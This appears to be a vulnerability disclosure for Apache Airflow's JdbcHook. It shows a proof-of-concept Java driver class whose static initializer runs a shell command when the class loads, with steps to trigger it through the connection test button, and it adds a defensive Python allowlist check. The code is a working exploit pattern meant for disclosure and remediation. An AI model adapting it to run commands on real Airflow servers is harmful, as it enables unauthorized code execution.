A privilege escalation vulnerability exists in airflow.providers.jdbc.hooks.jdbc.JdbcHook: the Driver Path and Driver Class parameters are controllable, which allows arbitrary Java code to be executed.
Vulnerability reproduction steps:
    import java.io.*;
    import java.sql.*;
    import java.util.Properties;
    import java.util.logging.Logger;

    public class Test implements Driver {
        // The static initializer runs as soon as the class is loaded.
        static {
            try {
                cmd();
                DriverManager.registerDriver(new Test());
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

        @Override
        public Connection connect(String url, Properties info) throws SQLException {
            return null;
        }

        @Override
        public boolean acceptsURL(String url) throws SQLException {
            try {
                cmd();
            } catch (IOException e) {
                throw new RuntimeException(e);
            }
            // Check whether the URL is one this driver supports
            return url.startsWith("jdbc:mydb:");
        }

        @Override
        public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException {
            return new DriverPropertyInfo[0];
        }

        @Override
        public int getMajorVersion() {
            return 1;
        }

        @Override
        public int getMinorVersion() {
            return 0;
        }

        @Override
        public boolean jdbcCompliant() {
            return false;
        }

        @Override
        public Logger getParentLogger() throws SQLFeatureNotSupportedException {
            return null;
        }

        // Runs "whoami" and writes its output to /tmp/airflow-jdbc.txt
        public static void cmd() throws IOException {
            String[] cmd = {"sh", "-c", "whoami"};
            Process p = Runtime.getRuntime().exec(cmd);
            InputStream in = p.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(in));
            File outputFile = new File("/tmp/airflow-jdbc.txt");
            BufferedWriter writer = new BufferedWriter(new FileWriter(outputFile));
            String line;
            while ((line = reader.readLine()) != null) {
                writer.write(line);
                writer.newLine();
            }
            writer.close();
        }
    }
Generate a jar package.
Configure the JDBC connection:
Go to the Connection configuration page.
Fill in the driver path with the path of the jar package generated in the previous step.
Fill in the driver class with the value Test.
Click on the test button:
Click on the test button; the command is executed and a file named airflow-jdbc.txt is generated in the /tmp directory.
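One way a deployment could constrain the two parameters used in the steps above, as an added example (not Airflow's code and not part of the original report): the driver class must be on an operator-maintained allowlist, and the jar must be the pinned file inside an admin-owned directory. The function names, the `approved` mapping and the directory layout are assumptions made for illustration.

```python
import hashlib
from pathlib import Path


class DriverNotAllowed(Exception):
    """Raised when a connection names a driver the operator has not approved."""


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large jars are not read into memory at once."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_jdbc_driver(driver_path: str, driver_class: str,
                      approved_dir: str, approved: dict) -> Path:
    """Return the resolved jar path, or raise DriverNotAllowed.

    `approved` (hypothetical structure) maps a driver class name to a
    (jar file name, expected SHA-256) pair maintained by the operator,
    never taken from the connection form itself.
    """
    if driver_class not in approved:
        raise DriverNotAllowed(f"driver class {driver_class!r} is not approved")
    jar_name, expected_hash = approved[driver_class]

    base = Path(approved_dir).resolve()
    jar = Path(driver_path).resolve()  # collapses ".." and follows symlinks
    if jar.parent != base or jar.name != jar_name:
        raise DriverNotAllowed(f"driver path {driver_path!r} is not the approved jar")
    if not jar.is_file():
        raise DriverNotAllowed(f"approved jar {jar} is missing")

    # Pinning the hash catches a jar that was swapped in place after approval.
    if sha256_of(jar) != expected_hash:
        raise DriverNotAllowed("jar contents do not match the pinned hash")
    return jar
```

A check like this belongs on the code path that handles the connection test as well as on the one that runs tasks, since the reproduction above triggers class loading from the test button.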
This is a screenshot of my email exchange with Airflow developers:
███